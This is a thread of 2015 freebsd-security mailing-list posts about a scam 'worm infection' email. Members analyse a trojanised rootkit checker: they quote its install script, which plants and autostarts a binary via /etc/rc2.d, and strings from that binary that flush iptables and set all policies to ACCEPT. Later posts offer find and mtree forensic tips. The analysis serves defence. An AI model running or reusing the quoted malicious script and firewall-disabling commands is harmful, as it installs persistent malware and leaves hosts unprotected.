Re: has my 10.1-RELEASE system been compromised
On Wed, Feb 25, 2015 at 04:04:59PM -0400, Joseph Mingrone wrote: > Jung-uk Kim writes: > > > On 02/25/2015 14:41, Joseph Mingrone wrote: > >> This morning when I arrived at work I had this email from my > >> university's IT department (via email.it) informing me that my host > >> was infected and spreading a worm. > >> > >> "Based on the logs fingerprints seems that your server is infected > >> by the following worm: Net-Worm.PHP.Mongiko.a" > >> > >> my ip here - - [23/Feb/2015:14:53:37 +0100] "POST > >> /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7 > >> HTTP/1.1" 200 429 "-" "Net- Worm.PHP.Mongiko.a" > >> > >> Despite the surprising name, I don't see any evidence that it's > >> related to php. I did remove php, because I don't really need it. > >> I've included my /etc/rc.conf below. pkg audit doesn't show any > >> vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show > >> much. I've run chkrootkit, netstat/sockstat and I don't see > >> anything suspicious and I plan to finally put some reasonable > >> firewall rules on this host. > >> > >> Do you have any suggestions? Should I include any other > >> information here? > > ... > > > > I found this: > > > > http://security.stackexchange.com/questions/82273/what-is-net-worm-php-mongiko-trying-to-do > > > > Jung-uk Kim > > Yeah, I saw that as well. I wouldn't be concerned if this was hitting > my web server, but the key difference here is that my IP is the > apparently the source in this case. Did you see the part of the link that said the alert was likely a scam? Sounds to me like the people who cold call people and tell them their Windows computer is broken have moved on. The fact your Uni's IT department sent an e-mail from email.it smells extremely suspicious to me. Why would they use a 3rd party e-mail solution instead of their own email system? Call your Uni's IT department and confirm the report came from them. Gary ___ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
Re: FreeBSD Security Advisory FreeBSD-SA-15:04.igmp (fwd) - ipfw fix?
--On 25 February 2015 18:21 +0100 Remko Lodder wrote: This suggests that you can filter the traffic: Block incoming IGMP packets by protecting your host/networks with a firewall. (Quote from the SA). It does, but it doesn't specifically say whether ipfw on *the host that's being protected* is sufficient I'd imagine in some scenarios that won't work (because the host simply receiving a malformed packet would cause issues) - so was just getting it clarified that an ipfw rule on the vulnerable *host itself* blocking igmp (any to any) is sufficient in this case. i.e. You don't need a 'external' firewall sat in front of the hosts to do that job. -Karl ___ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
Re: has my 10.1-RELEASE system been compromised
Am 26.02.2015 um 09:24 schrieb Gary Palmer : > On Wed, Feb 25, 2015 at 04:04:59PM -0400, Joseph Mingrone wrote: >> Jung-uk Kim writes: >> >>> On 02/25/2015 14:41, Joseph Mingrone wrote: This morning when I arrived at work I had this email from my university's IT department (via email.it) informing me that my host was infected and spreading a worm. "Based on the logs fingerprints seems that your server is infected by the following worm: Net-Worm.PHP.Mongiko.a" my ip here - - [23/Feb/2015:14:53:37 +0100] "POST /?cmd=info&key=f8184c819717b6815a8b8037e91c59ef&ip=212.97.34.7 HTTP/1.1" 200 429 "-" "Net- Worm.PHP.Mongiko.a" Despite the surprising name, I don't see any evidence that it's related to php. I did remove php, because I don't really need it. I've included my /etc/rc.conf below. pkg audit doesn't show any vulnerabilities. Searching for Worm.PHP.Mongiko doesn't show much. I've run chkrootkit, netstat/sockstat and I don't see anything suspicious and I plan to finally put some reasonable firewall rules on this host. Do you have any suggestions? Should I include any other information here? >>> ... >>> >>> I found this: >>> >>> http://security.stackexchange.com/questions/82273/what-is-net-worm-php-mongiko-trying-to-do >>> >>> Jung-uk Kim >> >> Yeah, I saw that as well. I wouldn't be concerned if this was hitting >> my web server, but the key difference here is that my IP is the >> apparently the source in this case. > > Did you see the part of the link that said the alert was likely a scam? > Sounds to me like the people who cold call people and tell them their Windows > computer is broken have moved on. the thing about the scam was posted by a friend after Joseph's post to the freebsd-security mailing list so people on stackexchange will be warned as well. Philip ___ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
Re: has my 10.1-RELEASE system been compromised
On Wed, 25 Feb 2015 20:55:43 +, Christopher Schulte wrote: > > On Feb 25, 2015, at 2:34 PM, Philip Jocks wrote: > > > > it felt pretty scammy to me, googling for the "worm" got me to > rkcheck.org which was registered a few days ago and looks like a > tampered version of chkrootkit. I hope, nobody installed it anywhere, > it seems to execute rkcheck/tests/.unit/test.sh which contains > > > > #!/bin/bash > > > > cp tests/.unit/test /usr/bin/rrsyncn > > chmod +x /usr/bin/rrsyncn > > rm -fr /etc/rc2.d/S98rsyncn > > ln -s /usr/bin/rrsyncn /etc/rc2.d/S98rsyncn > > /usr/bin/rrsyncn > > exit > > > > That doesn't look like something you'd want on your boxÿÿ > > I filed a report with Google about that domain (Google Safe > Browsing), briefly describing whatÿÿs been recounted here on this > thread. It seems quite suspicious, agreed. > > Has anyone started an analysis of the rrsyncn binary? The last few > lines of a simple string dump are interestingÿÿ take note what looks > to be an IP address of 95.215.44.195. > > /bin/sh > iptables -X 2> /dev/null > iptables -F 2> /dev/null > iptables -t nat -F 2> /dev/null > iptables -t nat -X 2> /dev/null > iptables -t mangle -F 2> /dev/null > iptables -t mangle -X 2> /dev/null > iptables -P INPUT ACCEPT 2> /dev/null > iptables -P FORWARD ACCEPT 2> /dev/null > iptables -P OUTPUT ACCEPT 2> /dev/null > udevd > 95.215.44.195 > ;*3$" > > > Cheers, > > > > Philip > > Chris Seeing as noone's mentioned it yet .. if your (linux) box were running iptables - a reasonable assumption - then running those commands would remove and flush all your rules, leaving you with a firewall that accepted everything, as good as no firewall at all. And then .. ? At least FreeBSD isn't the lowest hanging fruit for these monkeys .. cheers, Ian ___ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
Re: has my 10.1-RELEASE system been compromised
On Wed, Feb 25, 2015, at 14:19, Walter Hop wrote: > > Example: > # touch -t 20150101 foo > # find / -user www -newer foo > > If you don’t find anything, look back a little further. > Hopefully you will find a clue in this way. > Thanks for posting this trick -- I've never considered it before and will certainly put it in my toolbox! ___ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
Re: has my 10.1-RELEASE system been compromised
On Thu, 26 Feb 2015 at 12:02:52 -0600, Mark Felder wrote: > On Wed, Feb 25, 2015, at 14:19, Walter Hop wrote: > > > > Example: > > # touch -t 20150101 foo > > # find / -user www -newer foo > > Thanks for posting this trick -- I've never considered it before and > will certainly put it in my toolbox! While Walter is correct to give the universal form, if you know your system supports the -newerXY option you can skip the temporary file and use: # find / -user www -newermt 2015-01-01 Find is fun program to get to grips with to spot odd things going on. There's a tendency to assume you need to know what your looking for in the first place, but you can also tell it to show you things you don't know about: Files with an unknown user or group (tidying up after restoring partially from a backup, or spotting hacks that weren't quite elegant enough): # find / -nouser -o -nogroup I know my $PATH will have executables in it, and some other directories are almost certain to contain executables as well. But where are there executables that aren't in the usual places (maybe hacks, maybe users riding roughshod across the system installing things in strange places to trip people up later when they don't get patched)? # find -E / -type d -regex "`echo $PATH | sed -e \"s/:/\|/g\"`|/usr/libexec|/boot|/usr/src|/usr/local/etc/rc.d|/usr/local/lib|/usr/local/libexec|/usr/ports/.*/work|/usr/obj|/rescue|/etc/rc.d|/etc/periodic|/libexec" -prune -o -type f -perm +111 -print And you can combine them, of course: modified since 1st Jan 2015, a regular file and executable: # find / -newermt 2015-01-01 -type f -perm +111 Glyn. (Something of a fan of find :-) ___ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
Re: has my 10.1-RELEASE system been compromised
On Thu, Feb 26, 2015, at 14:12, Glyn Grinstead wrote: > On Thu, 26 Feb 2015 at 12:02:52 -0600, Mark Felder wrote: > > On Wed, Feb 25, 2015, at 14:19, Walter Hop wrote: > > > > > > Example: > > > # touch -t 20150101 foo > > > # find / -user www -newer foo > > > > Thanks for posting this trick -- I've never considered it before and > > will certainly put it in my toolbox! > > While Walter is correct to give the universal form, if you know your > system > supports the -newerXY option you can skip the temporary file and use: > > # find / -user www -newermt 2015-01-01 > > Find is fun program to get to grips with to spot odd things going on. > There's a tendency to assume you need to know what your looking for in > the first place, but you can also tell it to show you things you don't > know about: > > Files with an unknown user or group (tidying up after restoring partially > from a backup, or spotting hacks that weren't quite elegant enough): > > # find / -nouser -o -nogroup > > I know my $PATH will have executables in it, and some other directories > are > almost certain to contain executables as well. But where are there > executables that aren't in the usual places (maybe hacks, maybe users > riding > roughshod across the system installing things in strange places to trip > people up later when they don't get patched)? > > # find -E / -type d -regex "`echo $PATH | sed -e > \"s/:/\|/g\"`|/usr/libexec|/boot|/usr/src|/usr/local/etc/rc.d|/usr/local/lib|/usr/local/libexec|/usr/ports/.*/work|/usr/obj|/rescue|/etc/rc.d|/etc/periodic|/libexec" > -prune -o -type f -perm +111 -print > > And you can combine them, of course: modified since 1st Jan 2015, a > regular > file and executable: > > # find / -newermt 2015-01-01 -type f -perm +111 > > Glyn. > (Something of a fan of find :-) Please partner with MW Lucas and write a "find mastery" to document all of these clever uses of find. (I'd read it.) ___ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
Re: has my 10.1-RELEASE system been compromised
I'd also suggest you take a look at using mtree for tripwire-like functionality into the future - its primary purpose is to be able to take the specification for a directory tree and either report differences or make the filesystem conform to the specification. not sure whether it is used in the base FreeBSD system but it's definitely part of NetBSD where it is used to confirm the permissions and other metadata information for files from each of the release tarballs and (iirc) runs once a week as part of normal system cron mtree can also be turned on a directory tree to capture a specification that matches it ... it is better than find in this instance for comparing the state of a filesystem over time as it can be set to calculate file digests by a variety of algorithms and produce output that can be parsed and compared against later (which can be difficult with the -ls output from find) I also found a copy of it to run on Solaris to confirm that changes we were making to our source only had the desired impacts to large application data sets as part of our upgrade process plus until I mentioned it here, it might have been obscure enough for it not to be trojanned by a rootkit ... :) Hope that helps, Malcolm -- Malcolm Herbert m...@mjch.net ___ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
Re: has my 10.1-RELEASE system been compromised
On Thu, Feb 26, 2015, at 14:52, Malcolm Herbert wrote: > I'd also suggest you take a look at using mtree for tripwire-like > functionality into the future - its primary purpose is to be able to > take the specification for a directory tree and either report > differences or make the filesystem conform to the specification. > > not sure whether it is used in the base FreeBSD system but it's > definitely part of NetBSD where it is used to confirm the permissions > and other metadata information for files from each of the release > tarballs and (iirc) runs once a week as part of normal system cron > > mtree can also be turned on a directory tree to capture a specification > that matches it ... it is better than find in this instance for > comparing the state of a filesystem over time as it can be set to > calculate file digests by a variety of algorithms and produce output > that can be parsed and compared against later (which can be difficult > with the -ls output from find) > > I also found a copy of it to run on Solaris to confirm that changes we > were making to our source only had the desired impacts to large > application data sets as part of our upgrade process > > plus until I mentioned it here, it might have been obscure enough for > it not to be trojanned by a rootkit ... :) mtree is a really handy tool. I especially love it for large changes like changing the UIDs and GIDs for a lot of accounts. If you take an mtree dump, change the UIDs and GIDs, and re-apply the mtree dump it will quickly fix the permissions across your server because it stores the user and group names, not the IDs. I wish mtree was readily available on Linux. ___ freebsd-security@freebsd.org mailing list http://lists.freebsd.org/mailman/listinfo/freebsd-security To unsubscribe, send any mail to "freebsd-security-unsubscr...@freebsd.org"
